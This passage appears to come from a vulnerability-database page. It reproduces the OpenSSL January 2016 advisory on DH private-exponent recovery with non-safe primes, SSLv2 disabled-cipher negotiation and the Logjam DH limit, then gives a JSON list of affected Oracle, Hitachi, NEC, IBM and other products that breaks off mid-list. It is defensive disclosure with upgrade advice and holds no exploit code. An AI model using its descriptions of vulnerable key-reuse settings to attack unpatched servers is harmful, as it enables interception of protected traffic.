Historically OpenSSL usually only ever generated DH parameters based on "safe" primes. More recently (in version 1.0.2) support was provided for generating X9.42 style parameter files such as those required for RFC 5114 support. The primes used in such files may not be "safe". Where an application is using DH configured with parameters based on primes that are not "safe" then an attacker could use this fact to find a peer's private DH exponent. This attack requires that the attacker complete multiple handshakes in which the peer uses the same private DH exponent. For example this could be used to discover a TLS server's private DH exponent if it's reusing the private DH exponent or it's using a static DH ciphersuite.

OpenSSL provides the option SSL_OP_SINGLE_DH_USE for ephemeral DH (DHE) in TLS. It is not on by default. If the option is not set then the server reuses the same private DH exponent for the life of the server process and would be vulnerable to this attack. It is believed that many popular applications do set this option and would therefore not be at risk.

OpenSSL before 1.0.2f will reuse the key if: - SSL_CTX_set_tmp_dh()/SSL_set_tmp_dh() is used and SSL_OP_SINGLE_DH_USE is not set. - SSL_CTX_set_tmp_dh_callback()/SSL_set_tmp_dh_callback() is used, and both the parameters and the key are set and SSL_OP_SINGLE_DH_USE is not used. This is an undocumted feature and parameter files don't contain the key. - Static DH ciphersuites are used. The key is part of the certificate and so it will always reuse it. This is only supported in 1.0.2.

It will not reuse the key for DHE ciphers suites if: - SSL_OP_SINGLE_DH_USE is set - SSL_CTX_set_tmp_dh_callback()/SSL_set_tmp_dh_callback() is used and the callback does not provide the key, only the parameters. The callback is almost always used like this.

Non-safe primes are generated by OpenSSL when using: - genpkey with the dh_rfc5114 option. This will write an X9.42 style file including the prime-order subgroup size "q". This is supported since the 1.0.2 version. Older versions can't read files generated in this way. - dhparam with the -dsaparam option. This has always been documented as requiring the single use.

The fix for this issue adds an additional check where a "q" parameter is available (as is the case in X9.42 based parameters). This detects the only known attack, and is the only possible defense for static DH ciphersuites. This could have some performance impact.

Additionally the SSL_OP_SINGLE_DH_USE option has been switched on by default and cannot be disabled. This could have some performance impact.

This issue affects OpenSSL version 1.0.2.

OpenSSL 1.0.2 users should upgrade to 1.0.2f

OpenSSL 1.0.1 is not affected by this CVE because it does not support X9.42 based parameters. It is possible to generate parameters using non "safe" primes, but this option has always been documented as requiring single use and is not the default or believed to be common. However, as a precaution, the SSL_OP_SINGLE_DH_USE change has also been backported to 1.0.1r.

This issue was reported to OpenSSL on 12 January 2016 by Antonio Sanso (Adobe). The fix was developed by Matt Caswell of the OpenSSL development team (incorporating some work originally written by Stephen Henson of the OpenSSL core team).

SSLv2 doesn't block disabled ciphers (CVE-2015-3197)

Severity: Low

A malicious client can negotiate SSLv2 ciphers that have been disabled on the server and complete SSLv2 handshakes even if all SSLv2 ciphers have been disabled, provided that the SSLv2 protocol was not also disabled via SSL_OP_NO_SSLv2.

This issue affects OpenSSL versions 1.0.2 and 1.0.1.

OpenSSL 1.0.2 users should upgrade to 1.0.2f OpenSSL 1.0.1 users should upgrade to 1.0.1r

This issue was reported to OpenSSL on 26th December 2015 by Nimrod Aviram and Sebastian Schinzel. The fix was developed by Nimrod Aviram with further development by Viktor Dukhovni of the OpenSSL development team.

An update on DHE man-in-the-middle protection (Logjam)

A previously published vulnerability in the TLS protocol allows a man-in-the-middle attacker to downgrade vulnerable TLS connections using ephemeral Diffie-Hellman key exchange to 512-bit export-grade cryptography. This vulnerability is known as Logjam (CVE-2015-4000). OpenSSL added Logjam mitigation for TLS clients by rejecting handshakes with DH parameters shorter than 768 bits in releases 1.0.2b and 1.0.1n.

This limit has been increased to 1024 bits in this release, to offer stronger cryptographic assurance for all TLS connections using ephemeral Diffie-Hellman key exchange.

OpenSSL 1.0.2 users should upgrade to 1.0.2f OpenSSL 1.0.1 users should upgrade to 1.0.1r

The fix was developed by Kurt Roeckx of the OpenSSL development team.

Note

As per our previous announcements and our Release Strategy (https://www.openssl.org/policies/releasestrat.html), support for OpenSSL version 1.0.1 will cease on 31st December 2016. No security updates for that version will be provided after that date. Users of 1.0.1 are advised to upgrade.

Support for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those versions are no longer receiving security updates.

References

URL for this Security Advisory: https://www.openssl.org/news/secadv/20160128.txt

Note: the online version of the advisory may be updated with additional details over time.

For details of OpenSSL severity classifications please see: https://www.openssl.org/policies/secpolicy.html

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201602-0272",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "peoplesoft enterprise peopletools",
        "scope": "eq",
        "trust": 2.1,
        "vendor": "oracle",
        "version": "8.53"
      },
      {
        "model": "exalogic infrastructure",
        "scope": "eq",
        "trust": 2.1,
        "vendor": "oracle",
        "version": "2.0"
      },
      {
        "model": "peoplesoft enterprise peopletools",
        "scope": "eq",
        "trust": 2.1,
        "vendor": "oracle",
        "version": "8.54"
      },
      {
        "model": "exalogic infrastructure",
        "scope": "eq",
        "trust": 2.1,
        "vendor": "oracle",
        "version": "1.0"
      },
      {
        "model": "peoplesoft enterprise peopletools",
        "scope": "eq",
        "trust": 2.1,
        "vendor": "oracle",
        "version": "8.55"
      },
      {
        "model": "tuxedo",
        "scope": "eq",
        "trust": 2.1,
        "vendor": "oracle",
        "version": "12.1.1.0"
      },
      {
        "model": "oss support tools",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "oracle",
        "version": "8.11.16.3.8"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "oracle",
        "version": "5.0.16"
      },
      {
        "model": "unified computing system central software 1.2",
        "scope": null,
        "trust": 1.2,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "communications network charging and control",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "oracle",
        "version": "5.0.0.2.0"
      },
      {
        "model": "primavera p6 enterprise project portfolio management",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "oracle",
        "version": "15.1"
      },
      {
        "model": "primavera p6 enterprise project portfolio management",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "oracle",
        "version": "8.3"
      },
      {
        "model": "enterprise manager ops center",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "oracle",
        "version": "12.1.4"
      },
      {
        "model": "primavera p6 enterprise project portfolio management",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "oracle",
        "version": "8.4"
      },
      {
        "model": "primavera p6 enterprise project portfolio management",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "oracle",
        "version": "15.2"
      },
      {
        "model": "communications network charging and control",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "oracle",
        "version": "5.0.2.0.0"
      },
      {
        "model": "enterprise manager ops center",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "oracle",
        "version": "12.2.2"
      },
      {
        "model": "sun network 10ge switch 72p",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "oracle",
        "version": "1.2"
      },
      {
        "model": "switch es1-24",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "oracle",
        "version": "1.3"
      },
      {
        "model": "communications network charging and control",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "oracle",
        "version": "5.0.1.0.0"
      },
      {
        "model": "communications network charging and control",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "oracle",
        "version": "5.0.0.1.0"
      },
      {
        "model": "jd edwards enterpriseone tools",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "oracle",
        "version": "9.2.0.5"
      },
      {
        "model": "enterprise manager ops center",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "oracle",
        "version": "12.3.2"
      },
      {
        "model": "communications network charging and control",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "oracle",
        "version": "4.4.1.5.0"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1j"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1q"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1o"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.2a"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1e"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1m"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1i"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.2e"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1b"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1g"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1n"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1l"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1c"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.2d"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.2c"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.2b"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1p"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1a"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.2"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1d"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1k"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1h"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1f"
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "esmpro/serveragentservice",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "all versions  (linux)"
      },
      {
        "model": "ucosminexus developer standard",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v3.0"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "/sg series  univerge sg3000lg/lj"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v6.2"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.1r"
      },
      {
        "model": "cosminexus developer version 5",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v7.1"
      },
      {
        "model": "business intelligence",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "enterprise edition 11.1.1.9.0"
      },
      {
        "model": "cosminexus primary server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "base version 6"
      },
      {
        "model": "openssl",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.2"
      },
      {
        "model": "cosminexus developer standard version 6",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "cosminexus developer professional version 6",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "capssuite",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v3.0 to  v4.0 manager component"
      },
      {
        "model": "secureware/pki application development kit",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "ver3.01"
      },
      {
        "model": "enterprisedirectoryserver",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "all versions"
      },
      {
        "model": "web server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "none"
      },
      {
        "model": "ucosminexus developer",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "professional for plug-in"
      },
      {
        "model": "ucosminexus service platform",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "- messaging"
      },
      {
        "model": "cosminexus application server version 5",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v3.1"
      },
      {
        "model": "ucosminexus developer light",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "/sg series  sg3600lm/lg/lj v6.1"
      },
      {
        "model": "cosminexus developer light version 6",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "ucosminexus application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "st ard-r"
      },
      {
        "model": "ucosminexus service platform",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "none"
      },
      {
        "model": "business intelligence",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "enterprise edition 12.1.1.0.0"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v4.0"
      },
      {
        "model": "cosminexus application server enterprise",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "version 6"
      },
      {
        "model": "cosminexus primary server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "version 6"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v8.0"
      },
      {
        "model": "secureware/pki application development kit",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "ver3.02"
      },
      {
        "model": "communications applications",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "of  oracle enterprise session border controller ecz7.3m1p4 and earlier"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "/sg series  intersecvm/sg v1.2"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v7.0"
      },
      {
        "model": "ucosminexus primary server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "base"
      },
      {
        "model": "ucosminexus service architect",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "40g 10g 72/64 ethernet switch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "2.0.0"
      },
      {
        "model": "ucosminexus application server enterprise",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "mysql",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "5.6.29 and earlier"
      },
      {
        "model": "cosminexus application server standard",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "version 6"
      },
      {
        "model": "business intelligence",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "enterprise edition 11.1.1.7.0"
      },
      {
        "model": "mysql",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "5.7.11 and earlier"
      },
      {
        "model": "ucosminexus application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "express"
      },
      {
        "model": "sun blade 6000 ethernet switched nem 24p 10ge",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "1.2"
      },
      {
        "model": "oss support tools",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "oracle explorer 8.11.16.3.8"
      },
      {
        "model": "web server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "- security enhancement"
      },
      {
        "model": "websam",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "application navigator agent ver3.3 to  ver4.1"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.2f"
      },
      {
        "model": "ucosminexus developer",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "01"
      },
      {
        "model": "openssl",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "secureware/pki application development kit",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "ver3.0"
      },
      {
        "model": "websam mcoperations",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "ver3.6.2 to  ver4.2"
      },
      {
        "model": "websam",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "application navigator manager ver3.2.2 to  ver4.1"
      },
      {
        "model": "websam systemmanager",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "ver5.5.2 to  ver6.2.1"
      },
      {
        "model": "ucosminexus application server standard",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "business intelligence",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "enterprise edition 12.2.1.1.0"
      },
      {
        "model": "ucosminexus developer",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hitachi",
        "version": "professional"
      },
      {
        "model": "secureware/pki application development kit",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "ver3.1"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v8.2"
      },
      {
        "model": "ucosminexus application server smart edition",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "wireless ap",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "extremenetworks",
        "version": "396510.11.1"
      },
      {
        "model": "wireless ap",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "extremenetworks",
        "version": "382510.1.1"
      },
      {
        "model": "wireless ap",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "extremenetworks",
        "version": "386510.1.4"
      },
      {
        "model": "wireless ap",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "extremenetworks",
        "version": "380110.1.4"
      },
      {
        "model": "wireless ap",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "extremenetworks",
        "version": "396510.1.1"
      },
      {
        "model": "wireless ap",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "extremenetworks",
        "version": "380510.1.1"
      },
      {
        "model": "wireless ap",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "extremenetworks",
        "version": "382510.11.1"
      },
      {
        "model": "wireless ap",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "extremenetworks",
        "version": "386510.1.1"
      },
      {
        "model": "wireless ap",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "extremenetworks",
        "version": "371510.1.1"
      },
      {
        "model": "wireless ap",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "extremenetworks",
        "version": "380110.1.1"
      },
      {
        "model": "wireless ap",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "extremenetworks",
        "version": "371510.1.4"
      },
      {
        "model": "wireless ap",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "extremenetworks",
        "version": "380110.11.1"
      },
      {
        "model": "wireless ap",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "extremenetworks",
        "version": "393510.11.1"
      },
      {
        "model": "wireless ap",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "extremenetworks",
        "version": "382510.1.4"
      },
      {
        "model": "wireless ap",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "extremenetworks",
        "version": "393510.1.1"
      },
      {
        "model": "wireless ap",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "extremenetworks",
        "version": "380510.1.4"
      },
      {
        "model": "wireless ap",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "extremenetworks",
        "version": "396510.1.4"
      },
      {
        "model": "wireless ap",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "extremenetworks",
        "version": "380510.11.1"
      },
      {
        "model": "wireless ap",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "extremenetworks",
        "version": "371510.11.1"
      },
      {
        "model": "extremexos",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "extremenetworks",
        "version": "0"
      },
      {
        "model": "wireless ap",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "extremenetworks",
        "version": "386510.11.1"
      },
      {
        "model": "wireless ap",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "extremenetworks",
        "version": "393510.1.4"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.0.3"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.3.0.0"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.0.2"
      },
      {
        "model": "registered envelope service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "10.2-release-p8",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.3"
      },
      {
        "model": "proactive network operations center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.9"
      },
      {
        "model": "enterprise virtualization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "3"
      },
      {
        "model": "project openssl 1.0.1e",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.10"
      },
      {
        "model": "business process manager standard",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.5"
      },
      {
        "model": "cognos insight fp if",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.216"
      },
      {
        "model": "project openssl 1.0.1a",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.5.1.6"
      },
      {
        "model": "computer telephony integration object server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.5.1.131"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1"
      },
      {
        "model": "powerkvm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.4.0.0"
      },
      {
        "model": "10.1-release-p26",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.0.2"
      },
      {
        "model": "unified contact center enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.11"
      },
      {
        "model": "cognos insight fp",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.26"
      },
      {
        "model": "10.1-release-p5",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "10.0"
      },
      {
        "model": "watson explorer foundational components",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.0.6"
      },
      {
        "model": "real-time compression appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.2"
      },
      {
        "model": "cloud manager with openstack interim fix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.0.3"
      },
      {
        "model": "business process manager express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.6"
      },
      {
        "model": "prime license manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.2"
      },
      {
        "model": "9.3-release-p22",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "10.1-release-p28",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.2"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.4.0"
      },
      {
        "model": "ons series multiservice provisioning platforms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "154540"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "10"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.1"
      },
      {
        "model": "image construction and composition tool",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3.1.0"
      },
      {
        "model": "asa next-generation firewall services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "9.3-release-p10",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "9.3-release-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "opensuse evergreen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11.4"
      },
      {
        "model": "infosphere master data management standard/advanced edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "11.5"
      },
      {
        "model": "mq light client module for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.2014091001"
      },
      {
        "model": "powerkvm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.157"
      },
      {
        "model": "tivoli provisioning manager for os deployment build",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1.1051.07"
      },
